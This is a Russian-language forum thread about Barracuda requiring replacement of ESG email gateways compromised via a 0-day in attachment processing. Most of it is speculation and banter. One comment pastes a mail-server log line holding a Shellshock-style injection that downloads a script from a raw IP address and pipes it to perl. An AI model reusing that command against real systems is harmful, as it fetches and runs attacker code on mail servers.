Вариант для распечатки |
Пред. тема | След. тема | ||
Форум Разговоры, обсуждение новостей | |||
---|---|---|---|
Изначальное сообщение | [ Отслеживать ] |
"Компрометация шлюзов Barracuda ESG, требующая замены оборудования" | +/– | |
Сообщение от opennews (?), 11-Июн-23, 10:28 | ||
Компания Barracuda Networks объявила о необходимости физической замены устройств ESG (Email Security Gateway), поражённых вредоносным ПО в результате 0-day уязвимости в модуле обработки вложений к электронной почте. Сообщается, что для блокирования проблемы установки ранее выпущенных патчей недостаточно. Подробности не приводятся, но предположительно решение о замене оборудования принято из-за атаки, приведшей к установке вредоносного ПО на низком уровне, и невозможности его удалить путём замены прошивки или сброса в заводское состояние. Оборудование будет заменено бесплатно, о компенсации расходов на доставку и работу по замене не уточняется... | ||
Ответить | Правка | Cообщить модератору |
Оглавление |
Сообщения | [Сортировка по времени | RSS] |
1. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +12 +/– | |
Сообщение от КО (?), 11-Июн-23, 10:28 | ||
Комиссия спалила их бэкдор и теперь требуют убрать | ||
Ответить | Правка | Наверх | Cообщить модератору |
4. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +6 +/– | |
Сообщение от Аноним (4), 11-Июн-23, 10:32 | ||
Убрать эту компанию из списка поставщиков, бекдор оказалась слишком аппаратным. | ||
Ответить | Правка | Наверх | Cообщить модератору |
14. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +3 +/– | |
Сообщение от Аноним (14), 11-Июн-23, 11:08 | ||
новое железо с обновленным бекдором | ||
Ответить | Правка | Наверх | Cообщить модератору |
22. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +6 +/– | |
Сообщение от Аноним (22), 11-Июн-23, 12:04 | ||
На самом деле это достаточно просто устроить, имхо: если апдейт на фирмвару от хаксора откажется потом грузить фирменнные апдейты, а бутлоадер заменит на свой, отказывающийся шить вендорскую фирмвару... это все не так уж сложно сделать как можно себе представить. | ||
Ответить | Правка | К родителю #4 | Наверх | Cообщить модератору |
37. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +3 +/– | |
Сообщение от anodymus (?), 11-Июн-23, 14:49 | ||
> Жытаг осваивайте, там свое всегда отспорить можно :) | ||
Ответить | Правка | Наверх | Cообщить модератору |
86. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +1 +/– | |
Сообщение от Тот_ещё_аноним (ok), 12-Июн-23, 09:01 | ||
На колодку ставить) | ||
Ответить | Правка | Наверх | Cообщить модератору |
114. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от Аноним (114), 12-Июн-23, 22:47 | ||
1) STM32 F1xx и тому подобные - можно "вернуть себе" как раз всегда. Там лишь 1 уровень защиты от чтения - и он не запрещает дебаг или ROM loader насовсем, лишь ограничивает операции. Такой чип всегда можно вернуть в "девственный" вид, но, правда, только, после полного стирания - так что фирмвару из него вы не получите. Как минимум официально и удобно. | ||
Ответить | Правка | К родителю #37 | Наверх | Cообщить модератору |
83. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от Аноним (83), 12-Июн-23, 08:00 | ||
Intel Boot Guard должен запрещать загрузку вирусных прошивок BIOS/UEFI, а они уже вирусных BootLoader-ов и далее по цепочке верифицированной загрузки. | ||
Ответить | Правка | К родителю #22 | Наверх | Cообщить модератору |
72. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от igaiLie7 (?), 11-Июн-23, 23:44 | ||
Не смешно, когда собственные устройства работают против вас. Прогресс, а что поделать? Жизнь полна неожиданностей. | ||
Ответить | Правка | К родителю #4 | Наверх | Cообщить модератору |
118. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +1 +/– | |
Сообщение от Аноним (114), 12-Июн-23, 22:56 | ||
> Не смешно, когда собственные устройства работают против вас. | ||
Ответить | Правка | Наверх | Cообщить модератору |
2. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +13 +/– | |
Сообщение от Аноним (4), 11-Июн-23, 10:31 | ||
Всегда знал что эти аппаратные комплексы по защите чего угодно полная туфта. | ||
Ответить | Правка | Наверх | Cообщить модератору |
15. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | –15 +/– | |
Сообщение от пох. (?), 11-Июн-23, 11:10 | ||
Чего это вдруг? Вот жеж, защитили. Прибор защищенный плавким предохранителем успешно защитил предохранитель, расплавившись первым. | ||
Ответить | Правка | Наверх | Cообщить модератору |
24. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +4 +/– | |
Сообщение от Аноним (4), 11-Июн-23, 12:08 | ||
Я к тому зачем вообще этой штуке кроме софта, ещё какая-то своя аппаратная конструкция. Такое конечно делают во всяких аппаратных балансировщиках, для большой нагрузки. Но вот даже там понятно что ты это не сможешь обновиться так просто или научить эту штуку новым трюкам. | ||
Ответить | Правка | Наверх | Cообщить модератору |
27. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +3 +/– | |
Сообщение от Аноним (27), 11-Июн-23, 12:23 | ||
Я думаю, что всё гораздо проще. Перешили биос и поставили флаг защиты от записи в области, где конфиг чипсета хранится. И теперь чипсет не даёт прошить, нужно вынимать чип и в программатор его. Но так как вскрывать корпус категорически запрещено, ибо коммерческая тайна, копирайты и т.д., то будьте добры переслать Корпорации. | ||
Ответить | Правка | Наверх | Cообщить модератору |
30. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +3 +/– | |
Сообщение от пох. (?), 11-Июн-23, 12:38 | ||
> Я думаю, что всё гораздо проще. Перешили биос и поставили флаг защиты | ||
Ответить | Правка | Наверх | Cообщить модератору |
73. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +1 +/– | |
Сообщение от igaiLie7 (?), 11-Июн-23, 23:46 | ||
> А вы как всегда свою конспирологию на пустом месте разводите. | ||
Ответить | Правка | Наверх | Cообщить модератору |
29. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +1 +/– | |
Сообщение от пох. (?), 11-Июн-23, 12:35 | ||
> Я к тому зачем вообще этой штуке кроме софта, ещё какая-то своя аппаратная конструкция. | ||
Ответить | Правка | К родителю #24 | Наверх | Cообщить модератору |
63. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от kusb (?), 11-Июн-23, 22:46 | ||
А там ещё-что то совсем аппаратное есть, типа Asic? И их нельзя будет задействовать из-за уязвимости? А если использовать аккуратно asic, со знанием дела? | ||
Ответить | Правка | Наверх | Cообщить модератору |
70. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +1 +/– | |
Сообщение от Tron is Whistling (?), 11-Июн-23, 23:07 | ||
В барракудах? Нет там ничего. Обычный x86 с перелицованным корпусом. | ||
Ответить | Правка | Наверх | Cообщить модератору |
45. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +1 +/– | |
Сообщение от ivan_erohin (?), 11-Июн-23, 18:02 | ||
> Враг не прошел в корпоративную сеть. | ||
Ответить | Правка | К родителю #15 | Наверх | Cообщить модератору |
47. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от Аноним (47), 11-Июн-23, 18:30 | ||
Хорошая фантазия. На практике же, у этой железки нет доступа в корпоративную сеть. Это почтовый гейт, от которого до ближайшего Exchange минимум один фаерволл и один роутер, а по соседству в том же влане в лучшем случае второй такой же гейт. Да и то не факт, что им друг с другом разрешено общаться. Кроме того, исследования не нашли следов и возможностей для дальнейших эскалаций. | ||
Ответить | Правка | Наверх | Cообщить модератору |
54. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +1 +/– | |
Сообщение от ivan_erohin (?), 11-Июн-23, 19:56 | ||
> до ближайшего Exchange | ||
Ответить | Правка | Наверх | Cообщить модератору |
57. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от Аноним (47), 11-Июн-23, 20:18 | ||
И что изменилось с появлением взломанной Барракуды? Волшебные письма и пакеты получили +30 к волшебству? Эксчендж стал каким-то более уязвимым от того, что ровно те же письма по ровно тому же SMTP получает не напрямую с твоего открытого релея, а от гейта? | ||
Ответить | Правка | Наверх | Cообщить модератору |
61. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от Аноним (61), 11-Июн-23, 22:19 | ||
С большой вероятностью с той барракуды был открыт доступ к ексченджу и лдап АД.. хорошо если только по минимуму, к нужным портам, а не просто к IP (или, если "повезло", вообще он стоял внутри периметра)... | ||
Ответить | Правка | Наверх | Cообщить модератору |
75. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +1 +/– | |
Сообщение от Аноним (47), 11-Июн-23, 23:52 | ||
Тоже хорошая фантазия, и тоже ближе к фольклору, чем к реальности. Компании, которые пользуются подобными устройствами, так же используют референсную архитектуру, предоставляемую вендором. А в тех случаях, когда это невозможно, платят вендору или интегратору за кастомизацию. В противном случае вендор просто откажется от всех гарантий. И правильно сделает, в общем-то. Открытый доступ во внутреннюю сеть с почтового гейта бывает в сомнительных полуподвальных конторках, предпочитающих б/у с ебея, и эникеев с района. Но такие и не покупают вендорские решения для фильтрации почты, как раз наоборот, от них почту фильтровать приходится. | ||
Ответить | Правка | Наверх | Cообщить модератору |
79. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от пох. (?), 12-Июн-23, 00:25 | ||
> С большой вероятностью с той барракуды был открыт доступ к ексченджу | ||
Ответить | Правка | К родителю #61 | Наверх | Cообщить модератору |
81. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от _ (??), 12-Июн-23, 04:28 | ||
> Ну, может поумнеют и нормальный файрвол купят. Или имеющийся настроят. | ||
Ответить | Правка | Наверх | Cообщить модератору |
89. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от пох. (?), 12-Июн-23, 11:06 | ||
>> Ну, может поумнеют и нормальный файрвол купят. Или имеющийся настроят. | ||
Ответить | Правка | Наверх | Cообщить модератору |
101. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от Аноним (47), 12-Июн-23, 16:39 | ||
> "я тут новенький, а был я вообще-то разработчиком в cisco. А теперь я proud to be пресейл-менеджером в nginx+!" ЧТОА?! | ||
Ответить | Правка | Наверх | Cообщить модератору |
105. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от Аноним (105), 12-Июн-23, 18:24 | ||
>"я тут новенький, а был я вообще-то разработчиком в cisco. А теперь я proud to be пресейл-менеджером в nginx+!" ЧТОА?! | ||
Ответить | Правка | К родителю #89 | Наверх | Cообщить модератору |
128. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | –1 +/– | |
Сообщение от Аноним (114), 13-Июн-23, 10:30 | ||
> Лично знаю кучу народа, которые подались в продакт-менеджеры, сейлы, | ||
Ответить | Правка | Наверх | Cообщить модератору |
71. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от Tron is Whistling (?), 11-Июн-23, 23:11 | ||
Угу. Пришлось срочно перевыписывать все внешние сертификаты... тот ещё геморрой с учётом процедур. | ||
Ответить | Правка | К родителю #45 | Наверх | Cообщить модератору |
3. Скрыто модератором | –7 +/– | |
Сообщение от Аноним (-), 11-Июн-23, 10:31 | ||
Ответить | Правка | Наверх | Cообщить модератору |
6. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | –3 +/– | |
Сообщение от Аноним (6), 11-Июн-23, 10:32 | ||
Видимо, атака спецслужб. Кто ещё ради этого в прошивку полезет? Чё, бинго сорвали, многие покупатели устройства менять не станут/смогут, а выкинуть устройства в мусор они себе позволить не могут, так и будут юзать вредоносное устройство. Особенно, если они находятся в подсанкционном государстве, или против них введены санкции. | ||
Ответить | Правка | Наверх | Cообщить модератору |
8. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +1 +/– | |
Сообщение от Бывалый смузихлёб (?), 11-Июн-23, 10:36 | ||
так американские спецслужбы сделали что хотели, но сторонние хацкеры, пробравшись в их притон, спалили контору и теперь требуется срочно закрыть "внезапно обнаруженную" дыру | ||
Ответить | Правка | Наверх | Cообщить модератору |
9. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от Аноним (9), 11-Июн-23, 10:36 | ||
>нескольких видов вредоносного ПО - SALTWATER, SEASPY и SEASIDE | ||
Ответить | Правка | К родителю #6 | Наверх | Cообщить модератору |
26. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от n00by (ok), 11-Июн-23, 12:11 | ||
> Что, прямо в имплантах их названия записаны? | ||
Ответить | Правка | Наверх | Cообщить модератору |
28. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +1 +/– | |
Сообщение от Аноним (28), 11-Июн-23, 12:25 | ||
Да, специально, чтобы была для антивируса сигнатура, в авторстве сомнений не было, и чтобы реверсить было проще! Строки если нужны - то их наоборот хешируют. | ||
Ответить | Правка | Наверх | Cообщить модератору |
35. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +2 +/– | |
Сообщение от n00by (ok), 11-Июн-23, 14:29 | ||
Что тут обычно, так это качество анонимной экспертизы. По факту Rustock.C был так назван, поскольку содержал в себе путь к имени файла с исходниками. | ||
Ответить | Правка | Наверх | Cообщить модератору |
48. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от Аноним (47), 11-Июн-23, 18:32 | ||
Не смогут позволить что именно? Коробку скотчем замотать и лейбу на принтере распечатать? Замена за счёт вендора. | ||
Ответить | Правка | К родителю #6 | Наверх | Cообщить модератору |
49. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от пох. (?), 11-Июн-23, 18:38 | ||
> Не смогут позволить что именно? Коробку скотчем замотать и лейбу на принтере | ||
Ответить | Правка | Наверх | Cообщить модератору |
58. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от Аноним (47), 11-Июн-23, 20:21 | ||
Мальчик с тех пор подрос, и работает в UPS. Но таки да, печатать приходится на своём принтере. | ||
Ответить | Правка | Наверх | Cообщить модератору |
69. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от Tron is Whistling (?), 11-Июн-23, 23:06 | ||
Почему не станут-то? Нам вообще заменили мегаоперативно - мы обратились в первый день оповещений, через два дня получили пачку железок. | ||
Ответить | Правка | К родителю #6 | Наверх | Cообщить модератору |
102. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от Аноним (47), 12-Июн-23, 16:44 | ||
> Видимо, атака спецслужб. Кто ещё ради этого в прошивку полезет? | ||
Ответить | Правка | К родителю #6 | Наверх | Cообщить модератору |
119. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от Аноним (114), 12-Июн-23, 23:02 | ||
> Видимо, атака спецслужб. Кто ещё ради этого в прошивку полезет? | ||
Ответить | Правка | К родителю #6 | Наверх | Cообщить модератору |
10. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +11 +/– | |
Сообщение от YetAnotherOnanym (ok), 11-Июн-23, 10:36 | ||
> ESG представляет собой аппаратно-программный комплекс для защиты электронной почты предприятий от атак, спама и вирусов. | ||
Ответить | Правка | Наверх | Cообщить модератору |
20. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от Аноним (20), 11-Июн-23, 11:40 | ||
Ты не шаришь в goto? | ||
Ответить | Правка | Наверх | Cообщить модератору |
32. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +1 +/– | |
Сообщение от YetAnotherOnanym (ok), 11-Июн-23, 13:48 | ||
Пытаешься троллить или просто проецируешь? | ||
Ответить | Правка | Наверх | Cообщить модератору |
40. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от Ivan_83 (ok), 11-Июн-23, 15:52 | ||
goto ничем не плох, проме того что в кривых руках он ломает читабельность. | ||
Ответить | Правка | К родителю #10 | Наверх | Cообщить модератору |
53. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +6 +/– | |
Сообщение от Аноним (53), 11-Июн-23, 19:27 | ||
Классика жанра: | ||
Ответить | Правка | Наверх | Cообщить модератору |
64. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +1 +/– | |
Сообщение от Ivan_83 (ok), 11-Июн-23, 22:55 | ||
Вовсе нет. | ||
Ответить | Правка | Наверх | Cообщить модератору |
78. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | –2 +/– | |
Сообщение от Аноним (53), 12-Июн-23, 00:13 | ||
> использую для того чтобы вывалится в тот кусок функции который обрабатывает ошибку и освобождает ресурсы | ||
Ответить | Правка | Наверх | Cообщить модератору |
131. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от Ivan_83 (ok), 13-Июн-23, 21:59 | ||
И что с того? | ||
Ответить | Правка | Наверх | Cообщить модератору |
55. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от Liin (ok), 11-Июн-23, 20:03 | ||
> дёргать утилиты в дочернем шелле - ещё больший моветон, чем использовать goto | ||
Ответить | Правка | К родителю #10 | Наверх | Cообщить модератору |
88. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +2 +/– | |
Сообщение от Аноним (88), 12-Июн-23, 10:57 | ||
В программировании не бывает жёстких законов - только указания. | ||
Ответить | Правка | К родителю #10 | Наверх | Cообщить модератору |
126. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +1 +/– | |
Сообщение от Аноним (114), 13-Июн-23, 10:16 | ||
> GOTO удобен для описания конечных автоматов. | ||
Ответить | Правка | Наверх | Cообщить модератору |
11. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +1 +/– | |
Сообщение от Аноним (11), 11-Июн-23, 10:36 | ||
>Оборудование будет заменено бесплатно | ||
Ответить | Правка | Наверх | Cообщить модератору |
19. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от Аноним (19), 11-Июн-23, 11:26 | ||
Как "нейгочип" в DEHR? | ||
Ответить | Правка | Наверх | Cообщить модератору |
21. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | –1 +/– | |
Сообщение от n00by (ok), 11-Июн-23, 12:03 | ||
> Бэкдор SALTWATER был оформлен в виде модуля mod_udp.so | ||
Ответить | Правка | Наверх | Cообщить модератору |
23. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от Аноним (22), 11-Июн-23, 12:08 | ||
Email InSecurity gateway однако получился. Ну, что, кто еще из безопасников хочет нанять дешевых раджей разбирающихся в иб как свиньи в апельсинах? :) | ||
Ответить | Правка | Наверх | Cообщить модератору |
25. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от Аноним (4), 11-Июн-23, 12:10 | ||
Что теперь эту компанию оштрафуют на жесткие 60 000 рублей? Да пофиг можно не то что нанять дешевых, а вообще всех разогнать ничего не изменится. | ||
Ответить | Правка | Наверх | Cообщить модератору |
31. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +1 +/– | |
Сообщение от Самый Лучший Гусь (?), 11-Июн-23, 13:17 | ||
В очередной раз "кровавый энтерпрайз" показал что никакой он не кровавый а от другой всем извесной субстанции | ||
Ответить | Правка | Наверх | Cообщить модератору |
34. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от Атон (?), 11-Июн-23, 13:59 | ||
Какой же это энтерпрайз? это молодая динамично развивающаяся компания, а 5 прошивку, с которой все началось, делали вообще тиктокеры на удаленке. | ||
Ответить | Правка | Наверх | Cообщить модератору |
41. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +3 +/– | |
Сообщение от Самый Лучший Гусь (?), 11-Июн-23, 16:03 | ||
> Какой же это энтерпрайз? это молодая динамично развивающаяся компания, а 5 прошивку, | ||
Ответить | Правка | Наверх | Cообщить модератору |
44. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | –2 +/– | |
Сообщение от Атон (?), 11-Июн-23, 17:35 | ||
>> Какой же это энтерпрайз? это молодая динамично развивающаяся компания, а 5 прошивку, | ||
Ответить | Правка | Наверх | Cообщить модератору |
46. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от пох. (?), 11-Июн-23, 18:15 | ||
Ну щассс... сколько там лет ironport до покупки его циской? | ||
Ответить | Правка | Наверх | Cообщить модератору |
50. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от Атон (?), 11-Июн-23, 19:03 | ||
> Ну щассс... сколько там лет ironport до покупки его циской? | ||
Ответить | Правка | Наверх | Cообщить модератору |
51. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от Атон (?), 11-Июн-23, 19:10 | ||
> Ну щассс... сколько там лет ironport до покупки его циской? | ||
Ответить | Правка | К родителю #46 | Наверх | Cообщить модератору |
77. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от пох. (?), 12-Июн-23, 00:13 | ||
да хз - может избавлялась от неконтролируемых конкурентов, может назло врагам, а может деваться некуда - я уж и не помню, что там штатно в ironport, по-моему чуть ли не sophos был (то есть не свое и платить ему за каждое обновление) | ||
Ответить | Правка | Наверх | Cообщить модератору |
82. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от _ (??), 12-Июн-23, 04:50 | ||
> Но главная идея ironport не антивирус ни разу, а relay reputation network | ||
Ответить | Правка | Наверх | Cообщить модератору |
85. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от пох. (?), 12-Июн-23, 08:27 | ||
> - но я вежливо отказался. Они все на пистоне(!!!!!) переписывать | ||
Ответить | Правка | Наверх | Cообщить модератору |
120. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от Аноним (114), 12-Июн-23, 23:06 | ||
> вот, была бы непыльная работенка на всю жизнь, переписывать с пистона на | ||
Ответить | Правка | Наверх | Cообщить модератору |
33. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от анонимус (??), 11-Июн-23, 13:49 | ||
Не удивлюсь, если там внутри какой-нибудь amavis (который как раз на перле) | ||
Ответить | Правка | Наверх | Cообщить модератору |
36. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от Анонимус другой (?), 11-Июн-23, 14:36 | ||
>Проблема была вызвана отсутствием должной проверки имён файлов внутри tar-архивов, передаваемых в почтовом вложении, и позволяла выполнить произвольную команду в системе с повышенными привилегиями, обойдя экранирование при выполнении кода через Perl-оператор "qx". | ||
Ответить | Правка | Наверх | Cообщить модератору |
38. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от Аноним (38), 11-Июн-23, 15:01 | ||
Спамооборона | ||
Ответить | Правка | Наверх | Cообщить модератору |
39. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +1 +/– | |
Сообщение от Аноним (39), 11-Июн-23, 15:27 | ||
Jun 11 12:54:23 mg16 postfix/smtpd[10418]: warning: Illegal address syntax from serv1.jokeroo.com[104.200.159.174] in MAIL command: <() { :; }; wget -qO - 68.235.39.225/ipax|perl> | ||
Ответить | Правка | Наверх | Cообщить модератору |
42. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от Всем Анонимам Аноним (?), 11-Июн-23, 17:14 | ||
Коментарии на испанском | ||
Ответить | Правка | Наверх | Cообщить модератору |
122. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от Аноним (114), 12-Июн-23, 23:21 | ||
А что это вообще за дуршлаг? | ||
Ответить | Правка | К родителю #39 | Наверх | Cообщить модератору |
52. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +2 +/– | |
Сообщение от Аноним (52), 11-Июн-23, 19:17 | ||
Вот что бывает когда АНБ США набирает себе сотрудников для баланса гендерной нейтральности. Страдает профессионализм структуры. А былые времена уязвимость замаскировали бы так что лет 20 не нашли. | ||
Ответить | Правка | Наверх | Cообщить модератору |
56. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от Liin (ok), 11-Июн-23, 20:08 | ||
То, что они не могут пофиксить прошивку без замены устройства - это прям мегафакап для всей их архитектуры. CTO с командой можно гнать ссаными тряпками без выходного пособия. Так-то баги у всех бывают, но если ты не можешь пофиксить это без гемора для клиента - не надо тебе заниматься этим делом, выбери другую профессию. | ||
Ответить | Правка | Наверх | Cообщить модератору |
59. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от Аноним (20), 11-Июн-23, 20:57 | ||
CTO - это профессия грести деньги, а не менять прошивки. Вот ты его прогнал в другую отрасль, он пойдёт и тоже там зафакапит, увеличив личный счёт на пару лямов. В третий раз придёт воспитывать твоих детей, он же умеет. | ||
Ответить | Правка | Наверх | Cообщить модератору |
67. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от Tron is Whistling (?), 11-Июн-23, 23:04 | ||
Ды почему факап. Есть base OS, есть набор пакетов собственно аппликухи - "фирмварь". Base OS удалённо если и обновляется, то очень ограниченно. Дальше - как ты будешь чинить порутованную операционку удалённо? Она тебе этого может просто не дать сделать. Трахаться с IPMI и заливкой здоровенного образа через VCD/VUSB - это очень долго, проще выслать новую железку. Ну и да, где гарантии, что руткит собственно в фирмварь платы не залез, с утечками всяких интелоключей тоже не исключено. Лучше таки заменить целиком. | ||
Ответить | Правка | К родителю #56 | Наверх | Cообщить модератору |
68. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от Tron is Whistling (?), 11-Июн-23, 23:05 | ||
// IPMI для тяжёлых случаев у них есть, кстате, но, видимо, решили геморроев на ровном месте не разводить | ||
Ответить | Правка | Наверх | Cообщить модератору |
90. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от пох. (?), 12-Июн-23, 11:11 | ||
> // IPMI для тяжёлых случаев у них есть, кстате, но, видимо, решили | ||
Ответить | Правка | Наверх | Cообщить модератору |
104. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от Tron is Whistling (?), 12-Июн-23, 17:57 | ||
Деплойный образ-то скорее всего есть, особенно с учётом того, что у них даже виртуалки мать-мать чем-то внутри отличаются, download для каждого клиента свой. | ||
Ответить | Правка | Наверх | Cообщить модератору |
74. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от Liin (ok), 11-Июн-23, 23:50 | ||
> Дальше - как ты будешь чинить порутованную операционку удалённо? Она тебе этого | ||
Ответить | Правка | К родителю #67 | Наверх | Cообщить модератору |
91. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от пох. (?), 12-Июн-23, 11:15 | ||
> Ну мил человек, чай не в 20-м веке-то живем. Полно технологий и | ||
Ответить | Правка | Наверх | Cообщить модератору |
93. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от Liin (ok), 12-Июн-23, 12:12 | ||
> Ну поменяли коробки | ||
Ответить | Правка | Наверх | Cообщить модератору |
94. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от Поле Name не забыто и не прощено (?), 12-Июн-23, 14:11 | ||
В чём проблема замены-то? Одну железку почистить и снять, одну поставить и включить в кластер. | ||
Ответить | Правка | Наверх | Cообщить модератору |
97. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от Liin (ok), 12-Июн-23, 14:17 | ||
> В чём проблема замены-то? Одну железку почистить и снять, одну поставить и | ||
Ответить | Правка | Наверх | Cообщить модератору |
98. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от Поле Name не забыто и не прощено (?), 12-Июн-23, 14:23 | ||
Чо? Новые железки уязвимости не имеют. | ||
Ответить | Правка | Наверх | Cообщить модератору |
111. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от Liin (ok), 12-Июн-23, 19:41 | ||
> Чо? Новые железки уязвимости не имеют. | ||
Ответить | Правка | Наверх | Cообщить модератору |
112. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от Tron is Whistling (?), 12-Июн-23, 22:44 | ||
Да. Обязательно выключить всё и полгода разбираться. Клиенты подождут, главное - аудит. | ||
Ответить | Правка | Наверх | Cообщить модератору |
116. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +1 +/– | |
Сообщение от Tron is Whistling (?), 12-Июн-23, 22:52 | ||
И да, расскажи нам, благородный дон, что ты собрался аудитить в закрытой железке? | ||
Ответить | Правка | К родителю #111 | Наверх | Cообщить модератору |
117. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от Tron is Whistling (?), 12-Июн-23, 22:53 | ||
Я злой сегодня. | ||
Ответить | Правка | К родителю #111 | Наверх | Cообщить модератору |
121. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..." | +/– | |
Сообщение от Аноним (114), 12-Июн-23, 23:10 | ||
> Будешь всю 0.0.0.0/0 и ::/0 аудитить? Успехов. | ||
